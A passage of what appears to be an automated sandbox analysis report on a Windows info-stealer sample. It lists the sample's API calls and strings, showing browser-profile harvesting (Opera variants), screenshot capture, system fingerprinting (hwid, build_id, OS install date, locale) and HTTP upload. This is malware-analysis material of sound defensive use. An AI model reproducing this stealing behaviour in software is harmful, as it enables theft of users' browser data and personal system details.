InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404ACF
InternetCloseHandle.WININET(00000000), ref: 00404ADA
InternetCloseHandle.WININET(?), ref: 00404AEF
InternetCloseHandle.WININET(00000000), ref: 00404AF9

Strings

------, xrefs: 004048B9
", xrefs: 00404987
", xrefs: 0040483F
build_id, xrefs: 0040495E
!, xrefs: 00404AB5
hwid, xrefs: 00404816
------, xrefs: 004045FF
------, xrefs: 00404771

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
String ID: !$"$"$------$------$------$build_id$hwid
API String ID: 1585128682-3346224549
Opcode ID: ee956d695974c9b5f59e4f9e12a161d67f1cde6b0e86407fe14457c4f0616a06
Instruction ID: 05938b0e318a003ddb6cc0cd5bccca28d8fa4bc8ac54279827d029eeae647f4c
Opcode Fuzzy Hash: ee956d695974c9b5f59e4f9e12a161d67f1cde6b0e86407fe14457c4f0616a06
Instruction Fuzzy Hash: 76223F71805149EADB15E7E5C952BEEBBB8AF19304F2440AEF50173182DE782B4CCB79

Uniqueness

Uniqueness Score: -1.00%

Function 00417800 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 204
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00417838
FindFirstFileA.KERNEL32(?,?), ref: 0041784F
StrCmpCA.SHLWAPI(?,00428704), ref: 0041789C
StrCmpCA.SHLWAPI(?,00428708), ref: 004178B6
wsprintfA.USER32 ref: 004178DB
StrCmpCA.SHLWAPI(?,0042836E), ref: 004178EA
wsprintfA.USER32 ref: 00417907
PathMatchSpecA.SHLWAPI(?,?), ref: 00417937
lstrcat.KERNEL32(?,0145F8A0), ref: 00417963
lstrcat.KERNEL32(?,00428720), ref: 00417975
lstrcat.KERNEL32(?,?), ref: 00417983
lstrcat.KERNEL32(?,00428724), ref: 00417995
lstrcat.KERNEL32(?,?), ref: 004179A9

Strings

%s\%s, xrefs: 00417920
%s\*, xrefs: 0041782B
%s\%s, xrefs: 004178D5

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$FileFindFirstMatchPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 3088078853-445461498
Opcode ID: d61862649c0691cf466ae063ace5fa7c70b2f5291ea304154e783de05e2bbed1
Instruction ID: 98b5a54622b645726d4fda38e5423e71ee503b351a3d596aa25196b1fd800074
Opcode Fuzzy Hash: d61862649c0691cf466ae063ace5fa7c70b2f5291ea304154e783de05e2bbed1
Instruction Fuzzy Hash: ED81C475900219ABCB10EFA1DC85BEE77B9BF49704F50459EFA09A3181DB385B48CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004110A0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 166
memorycomtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4,00000000), ref: 004110C3
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C), ref: 004110D4
CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000), ref: 004110EE
CoSetProxyBlanket.OLE32(004283F4,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000), ref: 00411127
VariantInit.OLEAUT32(?), ref: 00411186

Part of subcall function 00410FF0: CoCreateInstance.OLE32(00428AE4,00000000,00000001,00428278,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?), ref: 0041100D
Part of subcall function 00410FF0: SysAllocString.OLEAUT32(?), ref: 0041101C
Part of subcall function 00410FF0: _wtoi64.MSVCRT ref: 00411062
Part of subcall function 00410FF0: SysFreeString.OLEAUT32(?), ref: 00411078
Part of subcall function 00410FF0: SysFreeString.OLEAUT32(00000000), ref: 0041107B

FileTimeToSystemTime.KERNEL32(0042840C,?,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?), ref: 004111C0
GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?), ref: 004111CC
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4), ref: 004111D3
VariantClear.OLEAUT32(?), ref: 00411217
wsprintfA.USER32 ref: 004111FF

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

WQL, xrefs: 00411144
Unknown, xrefs: 0041122E
Select * From Win32_OperatingSystem, xrefs: 00411137
ROOT\CIMV2, xrefs: 00411106
InstallDate, xrefs: 0041119B
Unknown, xrefs: 00411235
%d/%d/%d %d:%d:%d, xrefs: 004111F9

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
API String ID: 1611285705-2016369993
Opcode ID: 39b1fb2a7ba7e6d53decbf1ced49d5b46778855afd756b0b7f4cf079842b4c2d
Instruction ID: 2f8da4572961598b54827d09d40e8d86347dea92272749ef862c40ce3fce3f1e
Opcode Fuzzy Hash: 39b1fb2a7ba7e6d53decbf1ced49d5b46778855afd756b0b7f4cf079842b4c2d
Instruction Fuzzy Hash: 31517C71A01229ABCB24DB95DC49EFFBB7CEF49B10F10411AF605A3290D7789942CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411DF0 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 212windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411E2B
GetDesktopWindow.USER32 ref: 00411EC2
GetWindowRect.USER32(00000000,?), ref: 00411ECF
GetDC.USER32(00000000), ref: 00411ED6
CreateCompatibleDC.GDI32(00000000), ref: 00411EDF
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411EF0
SelectObject.GDI32(00000000,00000000), ref: 00411EFB
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411F1B
GlobalFix.KERNEL32(000000FF), ref: 00411F81
GlobalSize.KERNEL32(000000FF), ref: 00411F8E

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00404DD0: lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E56
Part of subcall function 00404DD0: StrCmpCA.SHLWAPI(?,0145F7A0,004278A7,004278A3,0042789B,00427897,00427896), ref: 00404EE1
Part of subcall function 00404DD0: InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F07

SelectObject.GDI32(00000000,?), ref: 0041200D
DeleteObject.GDI32(00000000), ref: 0041202B
DeleteObject.GDI32(00000000), ref: 00412032
ReleaseDC.USER32(00000000,00000000), ref: 0041203A
CloseWindow.USER32(00000000), ref: 00412041

Strings

image/jpeg, xrefs: 00411F3D

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Object$Window$CompatibleCreateDeleteGlobalSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
String ID: image/jpeg
API String ID: 2262162031-3785015651
Opcode ID: 8a9ceb8a640c1142b84bfe425a3677517ac850c695dfc15065c52484ca172122
Instruction ID: 2d4e664fba7b2a05d5ee53653e52332fc25948be14a74fdae1dc0a0959ef4bc3
Opcode Fuzzy Hash: 8a9ceb8a640c1142b84bfe425a3677517ac850c695dfc15065c52484ca172122
Instruction Fuzzy Hash: F48170B5900209EFDB14DFA4DD45BEEBBB9EF4A704F10412EFA05A3290DB385905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00416F50 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 161stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00416F8B
FindFirstFileA.KERNEL32(?,?), ref: 00416FA2
StrCmpCA.SHLWAPI(?,004286D4), ref: 00416FDF
StrCmpCA.SHLWAPI(?,004286D8), ref: 00416FF9
lstrcat.KERNEL32(?,0145F8A0), ref: 00417037
lstrcat.KERNEL32(?,0145F8D0), ref: 0041704B
lstrcat.KERNEL32(?,?), ref: 0041705F
lstrcat.KERNEL32(?,?), ref: 0041706D
lstrcat.KERNEL32(?,004286DC), ref: 0041707F
lstrcat.KERNEL32(?,?), ref: 00417093
FindNextFileA.KERNEL32(00000000,?), ref: 00417137

Strings

%s\%s, xrefs: 00416F7E

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFind$FirstNextwsprintf
String ID: %s\%s
API String ID: 111849568-4073750446
Opcode ID: ae65bbd2a58c776d948ce60f7386ac89f3ae0870c585c1044f1d338b9f653277
Instruction ID: 32a1530b6f6b3f971f2372f18af5ada9a00b89577cc7e7e1cca20f8dd29428d7
Opcode Fuzzy Hash: ae65bbd2a58c776d948ce60f7386ac89f3ae0870c585c1044f1d338b9f653277
Instruction Fuzzy Hash: 7B51E4B1800218ABCB10EBA0CC45BEE777DBF09704F40459EFB05A3181DB789B88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1B0 Relevance: 21.7, APIs: 7, Strings: 5, Instructions: 664fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

FindFirstFileA.KERNEL32(00000000,00000000,00000000,?,\*.*,?,?,00427ACE,00000000,?,00000005), ref: 0040B242
StrCmpCA.SHLWAPI(?,00427D0C), ref: 0040B2CC
StrCmpCA.SHLWAPI(?,00427D10), ref: 0040B2E6
StrCmpCA.SHLWAPI(00000000,Opera,00427ADB,00427ADA,00427AD7,00427AD6,00427AD3,00427AD2,00427ACF), ref: 0040B37B
StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040B393
StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040B3AB

Strings

Opera, xrefs: 0040B36A
Opera GX, xrefs: 0040B385
Opera Crypto, xrefs: 0040B39D
\*.*, xrefs: 0040B1F9
;, xrefs: 0040BB28

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: ;$Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1922906172
Opcode ID: 0326ac76d73bbb7b8e7228430f298a85a7715560c3c3b80257a25821b8c08668
Instruction ID: 9690fecaf8c131b8b47e39c0c5a29481523bcde2650c36add3c71b8764175778
Opcode Fuzzy Hash: 0326ac76d73bbb7b8e7228430f298a85a7715560c3c3b80257a25821b8c08668
Instruction Fuzzy Hash: 0F524E30915248EACB15EBA5C955BDDBBB45F19304F5040BEE905B32C2EF781B4CCBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401200 Relevance: 20.1, APIs: 8, Strings: 3, Instructions: 810fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00424344,?,004020E0,?,00424340,?,00000000,00000000,?,00000000), ref: 00401466
StrCmpCA.SHLWAPI(?,00424348), ref: 004014EC
StrCmpCA.SHLWAPI(?,0042434C), ref: 00401506

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Strings

@6, xrefs: 00401951, 00401954
&, xrefs: 00401D81
\*.*, xrefs: 00401362

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindFirstFolderPathlstrcat
String ID: &$\*.*$ @6
API String ID: 2051144152-2842159198
Opcode ID: 19b4a71a113587e3e149f119e1dcb7d57ce30e1d3e037629063eb4f8e980c3a2
Instruction ID: 44408c539f998d041f733f93c1a77994a807b49ce5d211e6c2eeeb93df41b793
Opcode Fuzzy Hash: 19b4a71a113587e3e149f119e1dcb7d57ce30e1d3e037629063eb4f8e980c3a2
Instruction Fuzzy Hash: 0A725D70811288EACB15E7A5C955BDDBBB85F29308F5440AEE905732C2DF781B4CCB7A

Uniqueness

Uniqueness Score: -1.00%

Function 19C54CF0 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 461fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 19C54EE1

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 19C54FB5
winOpen, xrefs: 19C55110
exclusive, xrefs: 19C54E81
psow, xrefs: 19C551F5

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: a85935071ed028ccb887984294324c805ba07e73e77383751ec2fc5b7b9a3d65
Instruction ID: eeb92eb2e088ba99ef655e86b2d393bd480e6a99e373443789db7790e17aa851
Opcode Fuzzy Hash: a85935071ed028ccb887984294324c805ba07e73e77383751ec2fc5b7b9a3d65
Instruction Fuzzy Hash: B5F1E272F043908FEB129F78E88971BB7E4BB54744F484929F88AD7291DB31D844CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00416BB0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 180stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416C29
memset.MSVCRT ref: 00416C4E
GetDriveTypeA.KERNEL32(00000000,?,?,00000000), ref: 00416C57
lstrcpy.KERNEL32(?,00000000), ref: 00416C76
lstrcpy.KERNEL32(?,00000000), ref: 00416C94
lstrcpy.KERNEL32(?,00000000), ref: 00416CB7
lstrlen.KERNEL32(00000000), ref: 00416D21

Strings

%DRIVE_REMOVABLE%, xrefs: 00416C7D
%DRIVE_FIXED%, xrefs: 00416C9B
*%DRIVE_REMOVABLE%*, xrefs: 00416BFA
*%DRIVE_FIXED%*, xrefs: 00416BD4

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 1884655365-147700698
Opcode ID: 830da2e487f3ce0b227e388ee222c70ddb13ae09def1f3dcb5d4933058a3c0e2
Instruction ID: fe13885b78f3290ecd7d39ef56567dba2d5f472473329e8ca487ae6efe04297a
Opcode Fuzzy Hash: 830da2e487f3ce0b227e388ee222c70ddb13ae09def1f3dcb5d4933058a3c0e2
Instruction Fuzzy Hash: 74619071600244ABDB31EF61CC45FEE7769EF05704F60412EBA1967182DF7C6A88CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004103D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

GetKeyboardLayoutList.USER32(00000000,00000000,004280A7,?,?,00000001), ref: 00410417
LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410429
GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410434
GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A

Strings

/ , xrefs: 00410471

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 0df075b8a160fa716b0fc136fe0564257bb7f45edc232721e5e63a5baa92d28c
Instruction ID: 32467d17135c4381fdee801ccc49f121a9f7beaa17eb491a29c7cc63036ba799
Opcode Fuzzy Hash: 0df075b8a160fa716b0fc136fe0564257bb7f45edc232721e5e63a5baa92d28c
Instruction Fuzzy Hash: 89319371900119EBCB10DFD5DC85BEEB7B9FB08704F50406EF209A3281DBB85A84CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00410360 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410371
HeapAlloc.KERNEL32(00000000), ref: 00410378
GetTimeZoneInformation.KERNEL32(?), ref: 00410387
wsprintfA.USER32 ref: 004103B2

Strings

wwww, xrefs: 00410398

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID: wwww
API String ID: 362916592-671953474
Opcode ID: 9d5e5e231dc68dbea5b4138935bfc65195b28b264b8e904b23ebb905f9ccea41
Instruction ID: 44720081d5bfcf4de0b039264fe6252f71ebe3c074e5847fe516a4db065da787
